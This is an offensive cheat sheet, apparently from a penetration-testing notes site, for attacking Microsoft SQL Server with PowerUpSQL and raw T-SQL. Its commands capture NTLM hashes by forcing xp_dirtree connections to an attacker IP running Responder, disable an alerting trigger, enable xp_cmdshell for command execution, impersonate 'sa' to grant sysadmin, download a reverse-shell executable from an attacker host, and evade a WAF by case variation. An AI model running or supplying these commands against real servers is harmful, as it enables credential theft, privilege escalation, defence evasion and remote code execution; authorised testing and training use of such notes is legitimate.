Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Enum
# Import Module
. .\PowerUpSQL.ps1
Sample Output:
TO-DO# Audit
Invoke-SQLAudit -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Verbose
Sample Output:
TO-DO# Execute Query
Get-SQLQuery -Instance <TARGET> -Username '<USER>' -Password '<PASSWORD>' -Query "<QUERY>" -Verbose
Sample Output:
TO-DORef: PowerUpSQL.ps1
Abuse #1: Steal NTLM hash
# In our local Linux machine
sudo responder -I tun0
Sample Output:
TO-DO
xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DOuse master; exec xp_dirtree '\\<LOCAL_IP>\any\thing';
Sample Output:
TO-DOload_file('\\<LOCAL_IP>\any\thing');
Sample Output:
TO-DOAbuse #2: Run xp_cmdshell
# Check any policy blocking xp_cmdshell
select name from sys.server_triggers;
Sample Output:
TO-DO# Disable trigger if any
disable trigger ALERT_xp_cmdshell on all server;
Sample Output:
TO-DO# Enable xp_cmdshell
enable_xp_cmdshell;
Sample Output:
TO-DO# RCE
xp_cmdshell whoami
Sample Output:
TO-DOAbuse #3: Impersonate sa to run xp_cmdshell
# Add user to sysadmin
execute as login = 'sa'; exec sp_addsrvrolemember '<USER>','sysadmin'
Sample Output:
TO-DO# Check
SELECT is_srvrolemember('sysadmin');
Sample Output:
TO-DOexecute as login = 'sa'; exec sp_configure 'show advanced options', 1;
Sample Output:
TO-DOexecute as login = 'sa'; reconfigure;
Sample Output:
TO-DOexecute as login = 'sa'; exec sp_configure 'xp_cmdshell', 1;
Sample Output:
TO-DOexecute as login = 'sa'; reconfigure;
Sample Output:
TO-DOexecute as login = 'sa'; EXEC master..xp_cmdshell 'powershell.exe -ep bypass curl <LOCAL_IP>/rev.exe -o C:\ProgramData\rev.exe'
Sample Output:
TO-DONote: try xp_cmDshElL to bypass WAF
Abuse #4: Run External Script
EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
Sample Output:
TO-DO